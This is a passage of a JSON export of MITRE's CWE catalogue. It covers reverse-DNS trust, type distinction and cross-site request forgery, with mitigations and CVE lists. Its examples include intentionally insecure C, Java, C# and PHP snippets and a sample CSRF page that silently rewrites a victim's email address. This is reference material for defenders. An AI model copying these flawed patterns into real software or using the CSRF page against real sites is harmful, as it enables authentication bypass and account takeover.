Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Untrusted Data Appended with Trusted Data","attr":{"@_Date":"2008-04-11"}}}},"350":{"attr":{"@_ID":"350","@_Name":"Reliance on Reverse DNS Resolution for a Security-Critical Action","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname.","Extended_Description":{"xhtml:p":["Since DNS names can be easily spoofed or misreported, and it may be difficult for the software to detect if a trusted DNS server has been compromised, DNS names do not constitute a valid authentication mechanism.","When the software performs a reverse DNS resolution for an IP address, if an attacker controls the server for that IP address, then the attacker can cause the server to return an arbitrary hostname. As a result, the attacker may be able to bypass authentication, cause the wrong hostname to be recorded in log files to hide activities, or perform other attacks.","Attackers can spoof DNS names by either (1) compromising a DNS server and modifying its records (sometimes called DNS cache poisoning), or (2) having legitimate control over a DNS server associated with their IP address."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"290","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"807","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"923","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"Malicious users can fake authentication information by providing false DNS information."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use other means of identity verification that cannot be simply spoofed. Possibilities include a username/password or certificate."},{"attr":{"@_Mitigation_ID":"MIT-42"},"Phase":"Implementation","Description":"Perform proper forward and reverse DNS lookups to detect DNS spoofing."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-93"},"Intro_Text":"The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct hostent *hp;struct in_addr myaddr;char* tHost = \\"trustme.example.com\\";myaddr.s_addr=inet_addr(ip_addr_string);hp = gethostbyaddr((char *) &amp;myaddr, sizeof(struct in_addr), AF_INET);if (hp &amp;&amp; !strncmp(hp-&gt;h_name, tHost, sizeof(tHost))) {} else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"trusted = false;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication."},{"Intro_Text":"In these examples, a connection is established if a request is made by a trusted host.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) &amp; serv, sizeof(serv));while (1) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);h=gethostbyname(inet_ntoa(cliAddr.sin_addr));if (h-&gt;h_name==...) n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) &amp; cli, &amp;clilen);","xhtml:br":["","","",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress IPAddress = rp.getAddress();int port = rp.getPort();if ((rp.getHostName()==...) &amp; (in==...)) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port);outSock.send(sp);","xhtml:br":["","",""]}}}}}}],"Body_Text":"These examples check if a request is from a trusted host before responding to a request, but the code only verifies the hostname as stored in the request packet. An attacker can spoof the hostname, thus impersonating a trusted client."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1488","Description":"Does not do double-reverse lookup to prevent DNS spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1488"},{"Reference":"CVE-2001-1500","Description":"Does not verify reverse-resolved hostnames in DNS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1500"},{"Reference":"CVE-2000-1221","Description":"Authentication bypass using spoofed reverse-resolved DNS hostnames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1221"},{"Reference":"CVE-2002-0804","Description":"Authentication bypass using spoofed reverse-resolved DNS hostnames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0804"},{"Reference":"CVE-2001-1155","Description":"Filter does not properly check the result of a reverse DNS lookup, which could allow remote attackers to bypass intended access restrictions via DNS spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"},{"Reference":"CVE-2004-0892","Description":"Reverse DNS lookup used to spoof trusted content in intermediary.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0892"},{"Reference":"CVE-2003-0981","Description":"Product records the reverse DNS name of a visitor in the logs, allowing spoofing and resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0981"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improperly Trusted Reverse DNS"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Trusting self-reported DNS name"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"275"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"89"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 15: Not Updating Easily.&#34; Page 231"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 24: Trusting Network Name Resolution.&#34; Page 361"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 16, &#34;DNS Spoofing&#34;, Page 1002"}}]},"Notes":{"Note":{"#text":"CWE-350, CWE-247, and CWE-292 were merged into CWE-350 in CWE 2.5. CWE-247 was originally derived from Seven Pernicious Kingdoms, CWE-350 from PLOVER, and CWE-292 from CLASP. All taxonomies focused closely on the use of reverse DNS for authentication of incoming requests.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Potential_Mitigations, References, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Improperly Trusted Reverse DNS","attr":{"@_Date":"2013-07-17"}}}},"351":{"attr":{"@_ID":"351","@_Name":"Insufficient Type Distinction","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly distinguish between different types of elements in a way that leads to insecure behavior.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"436","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2260","Description":"Browser user interface does not distinguish between user-initiated and synthetic events.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2260"},{"Reference":"CVE-2005-2801","Description":"Product does not compare all required data in two separate elements, causing it to think they are the same, leading to loss of ACLs. Similar to Same Name error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Type Distinction"}},"Notes":{"Note":{"#text":"Overlaps others, e.g. Multiple Interpretation Errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"352":{"attr":{"@_ID":"352","@_Name":"Cross-Site Request Forgery (CSRF)","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Stable"},"Description":"The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.","Extended_Description":"When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"346","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"441","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"642","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"613","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Session Riding"},{"Term":"Cross Site Reference Forgery"},{"Term":"XSRF"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Non-Repudiation","Access Control"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Application Data","Modify Application Data","DoS: Crash, Exit, or Restart"],"Note":"The consequences will vary depending on the nature of the functionality that is vulnerable to CSRF. An attacker could effectively perform any operations as the victim. If the victim is an administrator or privileged user, the consequences may include obtaining complete control over the web application - deleting or stealing data, uninstalling the product, or using it to launch other attacks against all of the product\'s users. Because the attacker has the identity of the victim, the scope of CSRF is limited only by the victim\'s privileges."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual analysis can be useful for finding this weakness, and for minimizing false positives assuming an understanding of business logic. However, it might not achieve desired code coverage within limited time constraints. For black-box analysis, if credentials are not known for privileged accounts, then the most security-critical portions of the application may not receive sufficient attention.","Consider using OWASP CSRFTester to identify potential issues and aid in manual analysis."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis","Description":"CSRF is currently difficult to detect reliably using automated techniques. This is because each application has its own implicit security policy that dictates which requests can be influenced by an outsider and automatically performed on behalf of a user, versus which requests require strong confidence that the user intends to make the request. For example, a keyword search of the public portion of a web site is typically expected to be encoded within a link that can be launched automatically when the user clicks on the link.","Effectiveness":"Limited"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Web Application Scanner"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"SOAR Partial"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, use anti-CSRF packages such as the OWASP CSRFGuard. [REF-330]","Another example is the ESAPI Session Management control, which includes a component for CSRF. [REF-45]"]}},{"Phase":"Implementation","Description":"Ensure that the application is free of cross-site scripting issues (CWE-79), because most CSRF defenses can be bypassed using attacker-controlled script."},{"Phase":"Architecture and Design","Description":"Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330). [REF-332]","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79)."},{"Phase":"Architecture and Design","Description":"Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79)."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Use the \\"double-submitted cookie\\" method as described by Felten and Zeller:","When a user visits a site, the site should generate a pseudorandom value and set it as a cookie on the user\'s machine. The site should require every form submission to include this value as a form value and also as a cookie value. When a POST request is sent to the site, the request should only be considered valid if the form value and the cookie value are the same.","Because of the same-origin policy, an attacker cannot read or modify the value stored in the cookie. To successfully submit a form on behalf of the user, the attacker would have to correctly guess the pseudorandom value. If the pseudorandom value is cryptographically strong, this will be prohibitively difficult.","This technique requires Javascript, so it may not work for browsers that have Javascript disabled. [REF-331]"]},"Effectiveness_Notes":"Note that this can probably be bypassed using XSS (CWE-79), or when using web technologies that enable the attacker to read raw headers from HTTP requests."},{"Phase":"Architecture and Design","Description":"Do not use the GET method for any request that triggers a state change."},{"Phase":"Implementation","Description":"Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79). An attacker could use XSS to generate a spoofed Referer, or to generate a malicious request from a page whose Referer would be allowed."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example PHP code attempts to secure the form submission process by validating that the user submitting the form has a valid session. A CSRF attack would not be prevented by this countermeasure because the attacker forges a request through the user\'s web browser in which a valid session already exists.","Body_Text":["The following HTML is intended to allow a user to update a profile.","profile.php contains the following code.","This code may look protected since it checks for a valid session. However, CSRF attacks can be staged from virtually any tag or HTML construct, including image tags, links, embed or object tags, or other attributes that load background images.","The attacker can then host code that will silently change the username and email address of any user that visits the page while remaining logged in to the target web application. The code might be an innocent-looking web page such as:","Notice how the form contains hidden fields, so when it is loaded into the browser, the user will not notice it. Because SendAttack() is defined in the body\'s onload attribute, it will be automatically called when the victim loads the web page.","Assuming that the user is already logged in to victim.example.com, profile.php will see that a valid user session has been established, then update the email address to the attacker\'s own address. At this stage, the user\'s identity has been compromised, and messages sent through this profile could be sent to the attacker\'s address."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form action=\\"/url/profile.php\\" method=\\"post\\"&gt;&lt;input type=\\"text\\" name=\\"firstname\\"/&gt;&lt;input type=\\"text\\" name=\\"lastname\\"/&gt;&lt;br/&gt;&lt;input type=\\"text\\" name=\\"email\\"/&gt;&lt;input type=\\"submit\\" name=\\"submit\\" value=\\"Update\\"/&gt;&lt;/form&gt;","xhtml:br":["","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"// initiate the session in order to validate sessionssession_start();if (! session_is_registered(\\"username\\")) {}update_profile();function update_profile {}","xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["//if the session is registered to a valid user then allow update","// The user session is valid, so process the request","// and update the information"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"echo \\"invalid session detected!\\";[...]exit;","xhtml:br":["","","","","",""],"xhtml:i":"// Redirect user to login page"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"SendUpdateToDatabase($_SESSION[\'username\'], $_POST[\'email\']);[...]echo \\"Your profile has been successfully updated.\\";","xhtml:br":["","","","","",""],"xhtml:i":["// read in the data from $POST and send an update","// to the database"]}}]}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;SCRIPT&gt;function SendAttack () {}&lt;/SCRIPT&gt;&lt;BODY onload=\\"javascript:SendAttack();\\"&gt;&lt;form action=\\"http://victim.example.com/profile.php\\" id=\\"form\\" method=\\"post\\"&gt;&lt;input type=\\"hidden\\" name=\\"firstname\\" value=\\"Funny\\"&gt;&lt;input type=\\"hidden\\" name=\\"lastname\\" value=\\"Joke\\"&gt;&lt;br/&gt;&lt;input type=\\"hidden\\" name=\\"email\\"&gt;&lt;/form&gt;","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"#text":"form.email = \\"attacker@example.com\\";form.submit();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"// send to profile.php"}}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1703","Description":"Add user accounts via a URL in an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1703"},{"Reference":"CVE-2004-1995","Description":"Add user accounts via a URL in an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1995"},{"Reference":"CVE-2004-1967","Description":"Arbitrary code execution by specifying the code in a crafted img tag or URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1967"},{"Reference":"CVE-2004-1842","Description":"Gain administrative privileges via a URL in an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1842"},{"Reference":"CVE-2005-1947","Description":"Delete a victim\'s information via a URL or an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1947"},{"Reference":"CVE-2005-2059","Description":"Change another user\'s settings via a URL or an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2059"},{"Reference":"CVE-2005-1674","Description":"Perform actions as administrator via a URL or an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1674"},{"Reference":"CVE-2009-3520","Description":"modify password for the administrator","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3520"},{"Reference":"CVE-2009-3022","Description":"CMS allows modification of configuration via CSRF attack against the administrator","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3022"},{"Reference":"CVE-2009-3759","Description":"web interface allows password changes or stopping a virtual machine via CSRF","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3759"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Cross-Site Request Forgery (CSRF)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A5","Entry_Name":"Cross Site Request Forgery (CSRF)","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":9,"Entry_Name":"Cross-site Request Forgery"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"111"}},{"attr":{"@_CAPEC_ID":"462"}},{"attr":{"@_CAPEC_ID":"467"}},{"attr":{"@_CAPEC_ID":"62"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and&#xA; Response Splitting).&#34; Page 37"}},{"attr":{"@_External_Reference_ID":"REF-329"}},{"attr":{"@_External_Reference_ID":"REF-330"}},{"attr":{"@_External_Reference_ID":"REF-331"}},{"attr":{"@_External_Reference_ID":"REF-332"}},{"attr":{"@_External_Reference_ID":"REF-333"}},{"attr":{"@_External_Reference_ID":"REF-334"}},{"attr":{"@_External_Reference_ID":"REF-335"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-956"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":"There can be a close relationship between XSS and CSRF (CWE-352).  An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload.  A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user\'s profile and add the attacker as a MySpace friend.  MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause."},{"attr":{"@_Type":"Theoretical"},"xhtml:p":"The CSRF topology is multi-channel:","xhtml:ol":{"xhtml:li":["Attacker (as outsider) to intermediary (as user). The interaction point is either an external or internal channel.","Intermediary (as user) to server (as victim). The activation point is an internal channel."]}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Description, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"Tom Stracener","Modification_Date":"2009-05-20","Modification_Comment":"Added demonstrative example for profile."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, 